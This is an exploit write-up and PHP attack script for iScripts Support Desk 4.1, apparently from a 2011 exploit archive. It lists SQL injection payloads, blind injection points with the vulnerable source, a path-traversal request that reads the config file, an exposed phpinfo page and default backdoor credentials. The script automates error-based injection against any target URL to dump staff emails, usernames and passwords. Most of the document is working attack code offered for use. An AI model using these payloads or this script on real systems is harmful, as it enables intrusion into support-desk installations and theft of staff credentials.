iScripts Support Desk version 4.1 suffers from local file disclosure, PHP info disclosure, and remote SQL injection vulnerabilities.
ffcd1cb4640b8a69da7b59123a421f1bc5a47d487d99e0d730b4d3d634ddabf1
<?
/*
[+] iScripts Support desk version 4.1
[+] Sql Injection Exploit
[+] Vuln & Exploit By i-Hmx
[+] sec4ever.com , 1337s.cc
I.Sql Injection vulns
> Normal Sql
postticketbeforeregistersave.php
Staff table
post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN
Get staff
Post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sptbl_staffs.vMail as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vLogin as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vPassword as char))),0x27,0x7e) from sptbl_staffs limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN
> Blind
/onlinetest.php
$comp = $_GET["comp"];
include("./config/settings.php");
include("./includes/functions/dbfunctions.php");
$conn = getConnection();
$sql_img = "select vChatIcon from sptbl_companies where nCompId='".$comp."'";
$res_img = executeSelect($sql_img,$conn);
if ( mysql_num_rows($res_img) > 0 ) {
Exploit : /onlinetest.php?id=1
/client_prechat.php
Line 3 : if ($_POST["comp"] !='' ) $comp = $_POST["comp"];
Line 245 :
$sql_dpt = "SELECT d.nDeptId, d.vDeptDesc FROM sptbl_depts d INNER JOIN sptbl_companies c
ON ( d.nCompId = c.nCompId ) WHERE d.nCompId = '".$comp."' ORDER BY d.vDeptDesc";
$res_dpt = executeSelect($sql_dpt,$conn);
Exploit as : site.com/supportdesk/client_prechat.php
Post parameter : comp=%inject_here%
/getChatIcon_det.php
Line 2 : $comp = $_GET["comp"];
Line 39 :
$sql = "select s.nStaffId from sptbl_staffs s inner join sptbl_staffdept sd on ( s.nStaffId = sd.nStaffId ) inner join sptbl_depts d on ( sd.nDeptId = d.nDeptId ) where s.vOnline='1' and s.vDelStatus='0' and d.nCompId='".$comp."'";
$result = executeSelect($sql,$conn);
if ( mysql_num_rows($result) > 0 ) {
$img_src = "images/chat/chat-icon-".$img_id."-online.gif";
} else {
$img_src = "images/chat/chat-icon-".$img_id."-offline.gif";
}
Exploit as : site.com/supportdesk/getChatIcon_det.php?comp=1
/getChatUpdates.php
if ( $_SESSION['sess_userid'] == "" ) echo "##X";
//So to Exploit it u should be logged in as normal user
else {
$mod = isset( $_GET['mod']) ? $_GET['mod'] : '' ;
$chatid = isset( $_GET['chatid']) ? $_GET['chatid'] : '' ;
$conn = getConnection();
$sql = "Select tMatter from sptbl_chat where nChatId='".$chatid."'";
$result = executeSelect($sql,$conn);
$rowcnt_chatUpd = mysql_num_rows($result);
Exploit : Login then Inject here > site.com/supportdesk/getChatUpdates.php?comp=1
You'd better use ur session id at havij for injection
II.Local File Disclosure
admin/csvdownload.php
$filename="../csvfiles/".addslashes($_GET["id"]);
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);
Exploit as : admin/csvdownload.php?id=../config/settings.php
III.PHP Info disclosure
/phpinfo.php
IV.Back Door user
don't know if the nulled version only is backdoored or all versions
but backdoor staff member is installed as
user : staff
pass : staff
*/
if(!$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/support/\n";
exit();
}
echo "[+] iScripts Support Desk Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
function faexploit($url,$inj){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url."postticketbeforeregistersave.php");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_POSTFIELDS,$inj);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$version=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select concat(0x66617273617779,0x3e3e,unhex(Hex(cast(version() as char))),0x3c3c)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
if(preg_match("/farsawy/",$version))
{
$ver=kastr($version,">>","<<");
echo "[-] Mysql Version : $ver\n";
$tbl=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x3e3e,unhex(Hex(cast(table_name as char))),0x3c3c) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
$stf=kastr($tbl,">>","<<");
echo "[-] Staffs table name : $stf\n";
$numb=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,count(*),0x3c3c) from sptbl_staffs)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
$num=kastr($numb,">>","<<");
echo "[-] Number of staff members : $num\n";
echo "[-] Staffs data ordered as : Email : Username: Password\n";
for($f=0;$f<$num;$f++)
{
$data=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,unhex(Hex(cast(vMail as char))),0x3a,unhex(Hex(cast(vLogin as char))),0x3a,unhex(Hex(cast(vPassword as char))),0x3c3c) from $stf limit $f,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
$ok=kastr($data,">>","<<");
echo " $ok\n";
}
echo "[+] Done\n";
exit(" Greets From Faris ;)");
}
else
{
echo "[-] Target Not vulnerable\n";
echo "[+] Exit\n";
exit();
}
// 07/2011
// i-Hmx
?>